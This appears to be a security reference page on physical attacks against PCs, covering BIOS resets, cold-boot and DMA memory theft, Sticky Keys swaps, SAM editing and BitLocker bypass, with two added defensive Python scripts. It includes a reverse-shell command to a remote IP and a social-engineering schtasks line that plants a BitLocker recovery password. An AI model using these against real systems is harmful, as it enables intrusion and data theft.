About Cyber Physical Attacks
In a physical attack, an attacker gains physical access to a
physical asset in the infrastructure system in order to damage it,
disable it, steal it, or use it in an undesirable way. … The goal is to produce a security system that has balanced physical protection for all potential adversary scenarios.
Here are some common examples of how physical threat vectors can compromise digital security:
- An infected USB drive is planted in a parking lot, lobby, etc., which an employee picks up and loads onto the network.
- An attacker breaks into a server room and installs rogue devices that capture confidential data.
- The internet drop line is accessible from outside of the building, allowing an attacker to intercept data or cut the line completely.
- An attacker pretends to be an employee and counts on a real employee’s courtesy to hold the door for him as they enter together.
- An inside actor looks over the shoulder of a system engineer as they type administrative credentials into a system.
Some common physical attacks:
BIOS password
The battery
Most motherboards have a CMOS battery. Remove it for about 30 minutes and the BIOS settings, password included, are reset to defaults. This only works where the password lives in battery-backed CMOS; many laptops store the supervisor password in non-volatile flash, where pulling the battery changes nothing.
CMOS jumper
Most motherboards have a jumper (often labelled CLR_CMOS or similar) that resets the settings. It connects a central pin to one of its two neighbours; with the board powered off, moving it to the other pin for a few seconds and then back clears the CMOS, password included.
Live tools
If you can boot a live Linux such as Kali from CD/USB, tools like killCmos or CmosPwd (the latter ships with Kali) read the CMOS memory and try to recover the BIOS password from it. They need root and, again, only help when the password is actually stored in CMOS.
UEFI attack
To inspect the UEFI configuration and attempt attacks against it, use chipsec. One of its exploit modules tries to disable Secure Boot by overwriting the Platform Key variable:
python chipsec_main.py -m exploits.secure.boot.pk
chipsec needs root/administrator and its kernel driver loaded, and the module only succeeds when the firmware leaves the PK variable writable without an authenticated update; a correctly implemented firmware rejects the write and Secure Boot stays enabled.
By RAM
Cold boot
Data in DRAM does not vanish the instant power is cut. At room temperature it decays over seconds to a minute or two, and chilling the modules (inverted canned air or liquid nitrogen) stretches that to minutes, long enough to cut power and either move the DIMMs to your own machine or reboot the victim into a minimal memory imager from USB. Because the original OS is no longer running at that point, the live-acquisition tools usually listed for Windows (dd.exe, mdd.exe, Memoryze, win32dd.exe, DumpIt) only apply while you still have an administrative session on the running machine; a cold-boot dump is taken by the boot-time imager. Either way, analyse the image with Volatility, or scan it directly for cryptographic keys, since disk-encryption keys such as BitLocker's are the usual target.
Inception is a physical memory manipulation tool that exploits PCI-based DMA. It can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interface: connect your machine to the victim over one of them and Inception patches physical memory so that any password typed at the lock or logon screen is accepted. It does not work against Windows 10, and on any system where firmware and OS enable IOMMU-based DMA protection the attacking device is denied the memory access it needs.
Live CD/USB Attacks
Sticky Keys and more
- SETHC: sethc.exe is invoked when SHIFT is pressed 5 times
- UTILMAN: Utilman.exe is invoked by pressing WINDOWS+U
- OSK: osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard
- DISP: DisplaySwitch.exe is invoked by pressing WINDOWS+P
These binaries live in C:\Windows\System32 and can all be launched from the logon screen before anyone authenticates. They are owned by TrustedInstaller, so from inside Windows you cannot simply overwrite them; from a live CD/USB with the disk mounted you can replace any of them with a copy of cmd.exe from the same folder. From then on, triggering that shortcut at the logon screen opens a command prompt running as SYSTEM.
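The swap described above leaves the accessibility binary byte-identical to cmd.exe, which is also the simplest way to detect it afterwards. The following is an added example, not code from the page: it hashes sethc.exe, utilman.exe, osk.exe and DisplaySwitch.exe and flags any whose content equals cmd.exe, which works both on a live host and on an offline image mounted for forensics. make_demo_tree() constructs a fake System32 so the check runs anywhere.

```python
"""Check a System32 directory for accessibility binaries replaced by cmd.exe.

Added example, not code from the page. The swap described above leaves
sethc.exe, utilman.exe, osk.exe or DisplaySwitch.exe byte-identical to
cmd.exe, so hashing each and comparing with cmd.exe detects it, whether
run on a live system or on an offline image mounted for forensics.
make_demo_tree() constructs a fake System32 so the check runs anywhere.
"""
import hashlib
import tempfile
from pathlib import Path

ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "DisplaySwitch.exe")


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 (the real binaries are a few hundred KB)."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32: Path) -> list:
    """Names of accessibility binaries whose content equals cmd.exe."""
    cmd_hash = sha256_file(system32 / "cmd.exe")
    swapped = []
    for name in ACCESSIBILITY_BINARIES:
        target = system32 / name
        if target.is_file() and sha256_file(target) == cmd_hash:
            swapped.append(name)
    return swapped


def make_demo_tree(root: Path, swap=("sethc.exe",)) -> Path:
    """Constructed fake System32: every name in `swap` is a copy of cmd.exe."""
    s32 = root / "Windows" / "System32"
    s32.mkdir(parents=True, exist_ok=True)
    cmd_body = b"MZ\x90\x00 fake cmd.exe body (constructed)"
    (s32 / "cmd.exe").write_bytes(cmd_body)
    for name in ACCESSIBILITY_BINARIES:
        body = cmd_body if name in swap else b"MZ\x90\x00 fake " + name.encode()
        (s32 / name).write_bytes(body)
    return s32


def demo() -> tuple:
    """Run the check on one tampered and one clean constructed tree."""
    tampered = make_demo_tree(Path(tempfile.mkdtemp()), swap=("sethc.exe", "utilman.exe"))
    clean = make_demo_tree(Path(tempfile.mkdtemp()), swap=())
    return find_swapped_binaries(tampered), find_swapped_binaries(clean)


if __name__ == "__main__":
    # On a real host: find_swapped_binaries(Path(r"C:\Windows\System32"))
    print(demo())
```

The check only catches a byte-for-byte copy of cmd.exe; an attacker who drops a different shell or a modified binary is only caught by comparing each file against a known-good hash from an identically patched system.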
Modifying SAM
You can use chntpw to edit the SAM hive of a mounted Windows filesystem, for example to blank or change the Administrator password. It ships with Kali.
chntpw -h
chntpw -l <path_to_SAM>
chntpw -u Administrator <path_to_SAM>
The -l form lists the users in the hive (it normally sits at Windows/System32/config/SAM under the mount point); the -u form opens the edit menu for that user, where blanking the password is the most reliable option. On a Linux target, edit /etc/shadow or /etc/passwd on the mounted filesystem instead.
Kon-Boot
Kon-Boot is a live CD/USB that logs you into Windows without the password. It hooks the BIOS (newer versions also support UEFI) and patches the Windows kernel in memory while it boots, so that the logon accepts anything as the password. The patch is not persistent: start the computer again without Kon-Boot and the original password applies, as if nothing had happened.
Kon-Boot also performs the Sticky Keys trick, so pressing Shift 5 times at the logon screen gives an administrative cmd.
Running Windows Attacks
Booting shortcuts
- Del (Supr on Spanish keyboards; F2, F10 or F12 on many vendors) – enter BIOS/UEFI setup
- F8 – legacy boot menu with recovery/safe mode (disabled by default on Windows 8 and later)
- Shift (held after the Windows banner) – go to the logon screen instead of autologon
BAD USBs
Rubber Ducky
The USB Rubber Ducky injects keystrokes at superhuman speeds, violating the inherent trust computers have in humans by posing as a keyboard.
Teensyduino
The Teensy is a complete USB-based microcontroller development system, in a very small footprint, capable of implementing many types of projects. All programming is done via the USB port.
Volume Shadow Copy
With administrator privileges you can create a shadow copy of the system volume (with vssadmin or through WMI from PowerShell) and copy the SAM and SYSTEM hives out of it, which gets around the lock Windows holds on the live files. The command below, which this page lists under this heading, is not a shadow-copy operation: it uses InstallUtil.exe to load a .NET assembly (c:\temp\psby.exe) with custom arguments that, by their names, configure a reverse shell to 10.10.13.206:443.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
Bypassing Bitlocker
BitLocker can unlock a volume with more than one protector: the user's password or PIN, and a 48-digit recovery password (8 groups of 6 digits). If the running Windows session has left a full memory dump at C:\Windows\MEMORY.DMP, the BitLocker keys may be inside it, together with the recovery password if it was typed during that session. Take that file plus an image of the filesystem and run Elcomsoft Forensic Disk Decryptor against them to decrypt the volume; this only works if the key material is actually present in the dump. You can also force a dump with Sysinternals NotMyFault, but that crashes and reboots the machine and has to be run as Administrator.
The remaining option is brute force with Passware Kit Forensic, which is only feasible against a weak user password or PIN.
Social Engineering
Finally, you can have a user who is an administrator run the following, which adds a recovery password of your choosing:
schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /f
This creates a task that runs manage-bde as SYSTEM at the next logon and adds a recovery password of 48 zeros. It is accepted because every 6-digit group of a recovery password must be a multiple of 11 below 720896, and 000000 qualifies. To list the protectors now valid for the volume, run:
manage-bde -protectors -get c:
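Both the memory-dump search and the all-zero recovery password above rely on the structure of a BitLocker recovery password. The following is an added example, not code from the page: it validates recovery passwords, converts them to and from the 16-byte recovery key, and scans a byte string for candidates in both ASCII and the UTF-16LE form Windows keeps strings in, discarding digit runs that fail the check. The facts it relies on are that each 6-digit group is a 16-bit word times 11 (hence divisible by 11 and below 720896) and that the 8 words, little-endian, form the key. The dump built by build_sample_dump() is constructed; point scan_dump() at the bytes of a real MEMORY.DMP for the search the text describes.

```python
"""Validate BitLocker recovery passwords and search a memory dump for them.

Added example, not code from the page. Facts it relies on: a recovery
password is 48 decimal digits in 8 groups of 6; each group is a 16-bit
word multiplied by 11, so it is divisible by 11 and below 720896
(11 * 65536), and the 8 words in little-endian order are the 128-bit
recovery key. That rule is why the all-zero password the schtasks command
above adds is accepted. scan_dump() runs the search the text describes
over an arbitrary byte string; build_sample_dump() constructs a fake one.
"""
import random
import re

GROUPS = 8
GROUP_LIMIT = 11 * 0x10000  # 720896: no 16-bit word times 11 reaches it


def _digits(pw: str) -> str:
    return pw.replace("-", "").replace(" ", "")


def is_valid_recovery_password(pw: str) -> bool:
    """True when every 6-digit group is a multiple of 11 below 720896."""
    d = _digits(pw)
    if len(d) != 6 * GROUPS or not d.isdigit():
        return False
    groups = [int(d[i:i + 6]) for i in range(0, len(d), 6)]
    return all(g % 11 == 0 and g < GROUP_LIMIT for g in groups)


def recovery_password_to_key(pw: str) -> bytes:
    """Undo the encoding: each group // 11 is one little-endian 16-bit word."""
    if not is_valid_recovery_password(pw):
        raise ValueError("not a well-formed BitLocker recovery password")
    d = _digits(pw)
    return b"".join((int(d[i:i + 6]) // 11).to_bytes(2, "little")
                    for i in range(0, len(d), 6))


def key_to_recovery_password(key: bytes) -> str:
    """Encode 16 key bytes the way manage-bde displays a recovery password."""
    if len(key) != 16:
        raise ValueError("recovery key must be 16 bytes")
    return "-".join(f"{int.from_bytes(key[i:i + 2], 'little') * 11:06d}"
                    for i in range(0, 16, 2))


def _pattern(digit: bytes, dash: bytes, prefix: bytes = b""):
    """8 groups of 6 digits, optionally dash-separated, as a bytes regex."""
    group = b"((?:" + digit + b"){6})"
    return re.compile(prefix + group + (dash + b"?" + group) * (GROUPS - 1))


# ASCII form (with a look-behind so a longer digit run is not cut up) and the
# UTF-16LE form Windows uses for in-memory strings.
PATTERNS = (
    ("ascii", _pattern(rb"[0-9]", rb"-", rb"(?<![0-9])")),
    ("utf-16-le", _pattern(rb"[0-9]\x00", rb"-\x00")),
)


def scan_dump(image: bytes) -> list:
    """Return [(offset, encoding, password)] for every valid candidate."""
    hits = []
    for encoding, pattern in PATTERNS:
        for m in pattern.finditer(image):
            pw = "-".join(g.decode(encoding) for g in m.groups())
            if is_valid_recovery_password(pw):
                hits.append((m.start(), encoding, pw))
    return sorted(hits)


def build_sample_dump() -> bytes:
    """Constructed fake dump: pseudo-random filler with two passwords planted."""
    rng = random.Random(1)
    filler = bytes(rng.getrandbits(8) for _ in range(3000))
    pw_ascii = key_to_recovery_password(bytes(range(16)))
    pw_zero = "-".join(["000000"] * GROUPS)  # the key the schtasks trick adds
    return (filler[:1000] + b"RecoveryPassword=" + pw_ascii.encode("ascii") + b"\r\n"
            + filler[1000:2000] + pw_zero.encode("utf-16-le") + filler[2000:])


def demo() -> list:
    return scan_dump(build_sample_dump())


if __name__ == "__main__":
    for off, enc, pw in demo():
        print(f"{off:#08x} {enc:9} {pw}")
```

A password that passes is_valid_recovery_password() is well-formed, not necessarily a protector of the volume; candidates pulled from a dump still have to be tried with manage-bde -unlock or a forensic decryptor, and the all-zero password only unlocks a volume on which someone has added it.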